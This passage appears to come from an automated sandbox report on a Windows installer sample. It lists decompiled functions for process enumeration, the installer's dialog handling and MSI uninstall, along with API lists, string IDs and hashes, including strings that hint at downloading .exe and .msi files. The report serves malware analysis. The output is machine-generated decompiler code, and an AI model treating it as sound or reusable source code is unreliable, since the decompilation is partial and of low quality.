                                                                                                                                                    • String ID: !$.exe$.exe?$.msi$.msi?$<$GET$Mozilla/5.0 (Windows NT 10.0)
                                                                                                                                                    • API String ID: 291142426-1574900714
                                                                                                                                                    • Opcode ID: 23c6ab6d2e114f450255878db0261c690e261d99c8849305db6547f79c6a01ea
                                                                                                                                                    • Instruction ID: 1f82d05bec92f71f31897bc4b1d6e0a39d18ce380cbdde7cf0022316cd336db7
                                                                                                                                                    • Opcode Fuzzy Hash: 23c6ab6d2e114f450255878db0261c690e261d99c8849305db6547f79c6a01ea
                                                                                                                                                    • Instruction Fuzzy Hash: F4123470810219EFDB14DFE4C954BEEBBB8BF16304F204569E116BB290DB745A48CFA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004063D8, Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E004063D8(signed int _a4) {
				void* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				struct HINSTANCE__* _v20;
				unsigned int _v24;
				_Unknown_base(*)()* _v28;
				char _v32;
				_Unknown_base(*)()* _v36;
				struct _OSVERSIONINFOW _v312;
				short _v832;
				intOrPtr _v1380;
				char _v1388;
				short _v1908;
				short _v2940;
				char _v2972;
				void* _t80;
				_Unknown_base(*)()* _t90;
				_Unknown_base(*)()* _t103;
				void* _t104;
				void* _t105;
				void* _t111;
				WCHAR* _t141;
				struct HINSTANCE__* _t142;
				unsigned int _t144;
				void* _t147;
				signed int _t152;
				intOrPtr* _t153;
				struct HINSTANCE__* _t154;
				void* _t155;
				signed int _t156;
				void* _t158;
				void* _t159;
				void* _t162;

				_t80 = GlobalAlloc(0x40, 0xfa0);
				_t141 = _a4;
				_v8 = _t80;
				_t152 = lstrlenW(_t141);
				_t3 = _t152 - 1; // -1
				if(_t3 > 0x103) {
					return 0x278;
				}
				_t156 = 0;
				if(_t152 <= 0) {
					L4:
					 *((short*)(_t162 + _t152 * 2 - 0x33c)) = 0;
					_v312.dwOSVersionInfoSize = 0x114;
					if(GetVersionExW( &_v312) != 0) {
						if(_v312.dwPlatformId == 2) {
							_t142 = LoadLibraryA("PSAPI.DLL");
							_v20 = _t142;
							if(_t142 != 0) {
								_t153 = GetProcAddress(_t142, "EnumProcesses");
								_v12 = GetProcAddress(_t142, "EnumProcessModules");
								_t90 = GetProcAddress(_t142, "GetModuleBaseNameW");
								_v16 = _t90;
								if(_t153 == 0 || _v12 == 0 || _t90 == 0) {
									_push(_t142);
									goto L35;
								} else {
									_push( &_v24);
									_push(0x3e8);
									_push(_v8);
									if( *_t153() != 0) {
										_a4 = _a4 & 0x00000000;
										_t144 = _v24 >> 2;
										if(_t144 == 0) {
											L24:
											GlobalFree(_v8);
											if(_v312.dwPlatformId != 1) {
												L44:
												FreeLibrary(_v20);
												return 0;
											}
											_t154 = LoadLibraryA("Kernel32.DLL");
											_v20 = _t154;
											if(_t154 == 0) {
												goto L10;
											}
											_a4 = GetProcAddress(_t154, "CreateToolhelp32Snapshot");
											_v12 = GetProcAddress(_t154, "Process32FirstW");
											_v16 = GetProcAddress(_t154, "Process32NextW");
											_v28 = GetProcAddress(_t154, "Module32FirstW");
											_t103 = GetProcAddress(_t154, "Module32NextW");
											_v36 = _t103;
											if(_v16 == 0 || _v12 == 0 || _t103 == 0 || _v28 == 0 || _a4 == 0) {
												L48:
												_push(_t154);
												L35:
												FreeLibrary();
												goto L10;
											} else {
												_t104 = _a4(2, 0);
												_v8 = _t104;
												if(_t104 == 0xffffffff) {
													goto L48;
												}
												_v1388 = 0x22c;
												_t105 = _v12(_t104,  &_v1388);
												while(_t105 != 0) {
													_t158 = _a4(8, _v1380);
													if(_t158 == 0xffffffff) {
														_t159 = 0x25d;
														L46:
														CloseHandle(_v8);
														FreeLibrary(_t154);
														L17:
														return _t159;
													}
													_v2972 = 0x428;
													_t111 = _v28(_t158,  &_v2972);
													while(_t111 != 0) {
														if(lstrcmpW( &_v2940,  &_v832) == 0) {
															CloseHandle(_t158);
															_t159 = 1;
															goto L46;
														}
														_v2972 = 0x428;
														_t111 = _v36(_t158,  &_v2972);
													}
													CloseHandle(_t158);
													_v1388 = 0x22c;
													_t105 = _v16(_v8,  &_v1388);
												}
												CloseHandle(_v8);
												goto L44;
											}
										} else {
											goto L19;
										}
										while(1) {
											L19:
											lstrcpyW( &_v1908, L"Unknown");
											_t155 = OpenProcess(0x410, 0,  *(_v8 + _a4 * 4));
											if(_t155 != 0) {
												_push( &_v24);
												_push(4);
												_push( &_v32);
												_push(_t155);
												if(_v12() != 0) {
													_v16(_t155, _v32,  &_v1908, 0x104);
												}
											}
											CloseHandle(_t155);
											if(lstrcmpW(CharUpperW( &_v1908),  &_v832) == 0) {
												break;
											}
											_a4 = _a4 + 1;
											if(_a4 < _t144) {
												continue;
											}
											goto L24;
										}
										_t142 = _v20;
										_t159 = 1;
										L16:
										FreeLibrary(_t142);
										GlobalFree(_v8);
										goto L17;
									}
									_t159 = 0x25d;
									goto L16;
								}
							}
							L10:
							return 0x25d;
						}
						if(_v312.dwPlatformId == 1) {
							goto L24;
						}
						return 0x25f;
					}
					return 0x25e;
				}
				_t147 = _t141 -  &_v832;
				do {
					 *((short*)(_t162 + _t156 * 2 - 0x33c)) = E00406057( *(_t162 + _t147 + _t156 * 2 - 0x33c) & 0x0000ffff);
					_t156 = _t156 + 1;
				} while (_t156 < _t152);
				goto L4;
			}




































                                                                                                                                                    0x004063eb
                                                                                                                                                    0x004063f1
                                                                                                                                                    0x004063f5
                                                                                                                                                    0x004063fe
                                                                                                                                                    0x00406400
                                                                                                                                                    0x00406408
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406742
                                                                                                                                                    0x0040640e
                                                                                                                                                    0x00406412
                                                                                                                                                    0x0040643b
                                                                                                                                                    0x0040643d
                                                                                                                                                    0x0040644c
                                                                                                                                                    0x0040645e
                                                                                                                                                    0x00406477
                                                                                                                                                    0x0040649b
                                                                                                                                                    0x0040649d
                                                                                                                                                    0x004064a2
                                                                                                                                                    0x004064bc
                                                                                                                                                    0x004064c6
                                                                                                                                                    0x004064c9
                                                                                                                                                    0x004064cb
                                                                                                                                                    0x004064d0
                                                                                                                                                    0x0040667c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004064e8
                                                                                                                                                    0x004064eb
                                                                                                                                                    0x004064ec
                                                                                                                                                    0x004064f1
                                                                                                                                                    0x004064f8
                                                                                                                                                    0x00406519
                                                                                                                                                    0x0040651d
                                                                                                                                                    0x00406522
                                                                                                                                                    0x004065b1
                                                                                                                                                    0x004065b4
                                                                                                                                                    0x004065c1
                                                                                                                                                    0x00406709
                                                                                                                                                    0x0040670c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406712
                                                                                                                                                    0x004065d2
                                                                                                                                                    0x004065d6
                                                                                                                                                    0x004065db
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004065ef
                                                                                                                                                    0x004065fa
                                                                                                                                                    0x00406605
                                                                                                                                                    0x00406610
                                                                                                                                                    0x00406613
                                                                                                                                                    0x00406615
                                                                                                                                                    0x0040661b
                                                                                                                                                    0x0040673c
                                                                                                                                                    0x0040673c
                                                                                                                                                    0x0040667d
                                                                                                                                                    0x0040667d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406644
                                                                                                                                                    0x00406647
                                                                                                                                                    0x0040664a
                                                                                                                                                    0x00406650
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406663
                                                                                                                                                    0x00406669
                                                                                                                                                    0x004066fc
                                                                                                                                                    0x00406693
                                                                                                                                                    0x00406698
                                                                                                                                                    0x00406716
                                                                                                                                                    0x0040671b
                                                                                                                                                    0x0040671e
                                                                                                                                                    0x00406725
                                                                                                                                                    0x0040650f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040650f
                                                                                                                                                    0x004066a2
                                                                                                                                                    0x004066ac
                                                                                                                                                    0x004066de
                                                                                                                                                    0x004066c7
                                                                                                                                                    0x00406731
                                                                                                                                                    0x00406739
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406739
                                                                                                                                                    0x004066d1
                                                                                                                                                    0x004066db
                                                                                                                                                    0x004066db
                                                                                                                                                    0x004066e3
                                                                                                                                                    0x004066f3
                                                                                                                                                    0x004066f9
                                                                                                                                                    0x004066f9
                                                                                                                                                    0x00406703
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406703
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406528
                                                                                                                                                    0x00406528
                                                                                                                                                    0x00406534
                                                                                                                                                    0x00406550
                                                                                                                                                    0x00406554
                                                                                                                                                    0x00406559
                                                                                                                                                    0x0040655a
                                                                                                                                                    0x0040655f
                                                                                                                                                    0x00406560
                                                                                                                                                    0x00406566
                                                                                                                                                    0x00406578
                                                                                                                                                    0x00406578
                                                                                                                                                    0x00406566
                                                                                                                                                    0x0040657c
                                                                                                                                                    0x0040659f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004065a5
                                                                                                                                                    0x004065ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004065ab
                                                                                                                                                    0x00406671
                                                                                                                                                    0x00406676
                                                                                                                                                    0x004064ff
                                                                                                                                                    0x00406500
                                                                                                                                                    0x00406509
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406509
                                                                                                                                                    0x004064fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004064fa
                                                                                                                                                    0x004064d0
                                                                                                                                                    0x004064a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004064a4
                                                                                                                                                    0x00406480
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406486
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406460
                                                                                                                                                    0x0040641a
                                                                                                                                                    0x0040641c
                                                                                                                                                    0x0040642d
                                                                                                                                                    0x00406435
                                                                                                                                                    0x00406437
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00406509
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                                    • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                    • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                    • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                    • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6309C0, Relevance: 54.3, APIs: 10, Strings: 21, Instructions: 93memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630A29
                                                                                                                                                      • Part of subcall function 6E628FD0: _DebugHeapAllocator.LIBCPMTD ref: 6E628FDE
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630A42
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630A5B
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630A74
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630A8D
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630AA6
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630ABF
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630AD8
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630AF1
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630B0A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap
                                                                                                                                                    • String ID: FormActInstall$FormActUninstall$FormActionScript$FormBuild$FormConditions$FormProperties$FormUIAction$PanePackage$Scripting/Conditions$Scripting/Objects$SiblDlg$UIScriptRecorder$Using/Interface$Using/Interface#_Advances-Options-Dialog$Using/Interface#_Build--Dialog$Using/Interface#_Install-Application-Dialog$Using/Interface#_Package-Properties$Using/Interface#_Uninstall-Application-Dialog$Using/UIAutomation$Using/UIAutomation#_UI-Script-Action-Dialog$|ohn
                                                                                                                                                    • API String ID: 571936431-2188770554
                                                                                                                                                    • Opcode ID: 6b192da9ba4ee6b5af3e3cbf85328a1c717b568da0f9206d4d586bb73cda7e92
                                                                                                                                                    • Instruction ID: d54b3d5b2ad9b666c764ea457ca06ccf721d96b2dbbb4051986d7e79b7130c38
                                                                                                                                                    • Opcode Fuzzy Hash: 6b192da9ba4ee6b5af3e3cbf85328a1c717b568da0f9206d4d586bb73cda7e92
                                                                                                                                                    • Instruction Fuzzy Hash: 0B31AF30B4911AABCF449FE4CD54AAEB3AAAF91748F101D29A1216F7D4EF346C109B5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E624440, Relevance: 51.0, APIs: 19, Strings: 10, Instructions: 277memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62448D
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E62449C
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E6244A3
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6244FD
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624516
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E62452A
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWorkstd::ios_base::good
                                                                                                                                                    • String ID: .exe$/x %s$/x %s %s$Application %s %s is not installed. Action canceled.$Application %s is installed. Try to uninstall...$Application %s ver. %s is installed. Try to uninstall...$Application key is empty$[SystemFolder]msiexec.exe$unsupported uninstall command: $|8bn
                                                                                                                                                    • API String ID: 1085074254-2327642842
                                                                                                                                                    • Opcode ID: c4425900c54332af75757d70fb52fe6dd61bbeea2e5dc4fae37a26f10fc6fba5
                                                                                                                                                    • Instruction ID: 7d46fc24717d38420323454f3b7fe16d7cf3f4b6e3bc6cb3274d8fe6e1891c41
                                                                                                                                                    • Opcode Fuzzy Hash: c4425900c54332af75757d70fb52fe6dd61bbeea2e5dc4fae37a26f10fc6fba5
                                                                                                                                                    • Instruction Fuzzy Hash: 70B16C70D00149EFDB04DFE4DC50AFEBBB8AF54308F508968E4126B285DB746A05CFAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004054A5, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E004054A5(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				void* _v20;
				struct HWND__* _v32;
				void* _v72;
				void* _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					 *0x441d54 = _t37;
					__eflags = _t118 - 0x110;
					if(_t118 == 0x110) {
						 *0x47eab4 = _t128;
						 *0x441d74 = GetDlgItem(_t128, 1);
						_t93 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x441d64 = _t93;
						E00403D6B(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x476a70);
						 *0x476a74 = E0040141D(4);
						_t37 = 1;
						__eflags = 1;
						 *0x441d54 = 1;
					}
					_t125 =  *0x40c014; // 0xffffffff
					_t133 = (_t125 << 6) +  *0x47eac0;
					_t136 = 0;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00403DDB(0x40b);
						while(1) {
							_t39 =  *0x441d54;
							 *0x40c014 =  *0x40c014 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40c014; // 0xffffffff
							__eflags = _t41 -  *0x47eac4;
							if(_t41 ==  *0x47eac4) {
								E0040141D(1);
							}
							__eflags =  *0x476a74 - _t136;
							if( *0x476a74 != _t136) {
								break;
							}
							__eflags =  *0x40c014 -  *0x47eac4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406831(_t119, _t128, _t133, 0x4f70f0,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00403D6B(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00403D6B(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00403D6B(_t128);
							_t51 = GetDlgItem(_t128, 3);
							_v32 = _t51;
							__eflags =  *0x47eb6c - _t136;
							if( *0x47eb6c != _t136) {
								_t119 = _t119 & 0xfffffefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008);
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
							E00403DB1(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x441d64, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x47eb6c - _t136;
							if( *0x47eb6c == _t136) {
								_push( *0x441d74);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x441d64);
							}
							E00403DC4();
							_push(0x451d98);
							E00406035();
							E00406831(0x451d98, _t128, _t133,  &(0x451d98[lstrlenW(0x451d98)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x451d98);
							_push(_t136);
							_t69 = E0040139D( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x476a68);
									 *0x461db8 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x47eab8,  *_t133 +  *0x476a7c & 0x0000ffff, _t128,  *(0x40c018 +  *(_t133 + 4) * 4), _t133);
									 *0x476a68 = _t75;
									__eflags = _t75 - _t136;
									if(_t75 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00403D6B(_t75);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x476a68, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E0040139D( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x476a74 - _t136;
									if( *0x476a74 != _t136) {
										goto L61;
									}
									ShowWindow( *0x476a68, 8);
									E00403DDB(0x405);
									goto L58;
								}
								__eflags =  *0x47eb6c - _t136;
								if( *0x47eb6c != _t136) {
									goto L61;
								}
								__eflags =  *0x47eb60 - _t136;
								if( *0x47eb60 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x476a68);
						 *0x47eab4 = _t136;
						EndDialog(_t128,  *0x461dc0);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E0040139D( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x476a68, 0x40f, 0, 1);
						__eflags =  *0x476a74;
						return 0 |  *0x476a74 == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x441d70, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x441d70,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E00403DF6(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x476a68, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x47eb6c - _t136;
										if( *0x47eb6c == _t136) {
											_t102 = E0040141D(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x461dc0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D44();
											goto L26;
										}
										E0040141D(_t130);
										 *0x461dc0 = _t130;
										goto L21;
									}
									__eflags =  *0x40c014 - _t136; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x476a68);
						 *0x476a68 = _a12;
						L58:
						if( *0x461dcc == _t136 &&  *0x476a68 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x461dcc = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                                                                    0x004054a9
                                                                                                                                                    0x004054b7
                                                                                                                                                    0x004055f9
                                                                                                                                                    0x004055fd
                                                                                                                                                    0x00405601
                                                                                                                                                    0x00405606
                                                                                                                                                    0x00405608
                                                                                                                                                    0x00405613
                                                                                                                                                    0x0040561e
                                                                                                                                                    0x00405623
                                                                                                                                                    0x00405625
                                                                                                                                                    0x00405627
                                                                                                                                                    0x0040562a
                                                                                                                                                    0x0040562f
                                                                                                                                                    0x0040563d
                                                                                                                                                    0x0040564a
                                                                                                                                                    0x00405651
                                                                                                                                                    0x00405651
                                                                                                                                                    0x00405652
                                                                                                                                                    0x00405652
                                                                                                                                                    0x00405657
                                                                                                                                                    0x00405662
                                                                                                                                                    0x00405668
                                                                                                                                                    0x0040566a
                                                                                                                                                    0x0040566c
                                                                                                                                                    0x004056ac
                                                                                                                                                    0x004056b1
                                                                                                                                                    0x004056b6
                                                                                                                                                    0x004056b6
                                                                                                                                                    0x004056bb
                                                                                                                                                    0x004056c4
                                                                                                                                                    0x004056c6
                                                                                                                                                    0x004056cb
                                                                                                                                                    0x004056d1
                                                                                                                                                    0x004056d5
                                                                                                                                                    0x004056d5
                                                                                                                                                    0x004056da
                                                                                                                                                    0x004056e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004056eb
                                                                                                                                                    0x004056f1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004056fa
                                                                                                                                                    0x00405702
                                                                                                                                                    0x00405707
                                                                                                                                                    0x0040570a
                                                                                                                                                    0x00405710
                                                                                                                                                    0x00405715
                                                                                                                                                    0x00405718
                                                                                                                                                    0x0040571e
                                                                                                                                                    0x00405723
                                                                                                                                                    0x00405726
                                                                                                                                                    0x0040572c
                                                                                                                                                    0x00405734
                                                                                                                                                    0x0040573a
                                                                                                                                                    0x0040573e
                                                                                                                                                    0x00405744
                                                                                                                                                    0x0040574c
                                                                                                                                                    0x0040574c
                                                                                                                                                    0x0040574c
                                                                                                                                                    0x00405756
                                                                                                                                                    0x00405768
                                                                                                                                                    0x00405774
                                                                                                                                                    0x00405779
                                                                                                                                                    0x00405783
                                                                                                                                                    0x00405789
                                                                                                                                                    0x0040578b
                                                                                                                                                    0x00405790
                                                                                                                                                    0x0040578d
                                                                                                                                                    0x0040578d
                                                                                                                                                    0x0040578d
                                                                                                                                                    0x004057a0
                                                                                                                                                    0x004057b8
                                                                                                                                                    0x004057ba
                                                                                                                                                    0x004057c0
                                                                                                                                                    0x004057d5
                                                                                                                                                    0x004057c2
                                                                                                                                                    0x004057cb
                                                                                                                                                    0x004057cd
                                                                                                                                                    0x004057cd
                                                                                                                                                    0x004057db
                                                                                                                                                    0x004057ea
                                                                                                                                                    0x004057eb
                                                                                                                                                    0x00405801
                                                                                                                                                    0x00405808
                                                                                                                                                    0x0040580e
                                                                                                                                                    0x00405812
                                                                                                                                                    0x00405817
                                                                                                                                                    0x00405819
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040581f
                                                                                                                                                    0x0040581f
                                                                                                                                                    0x00405821
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405827
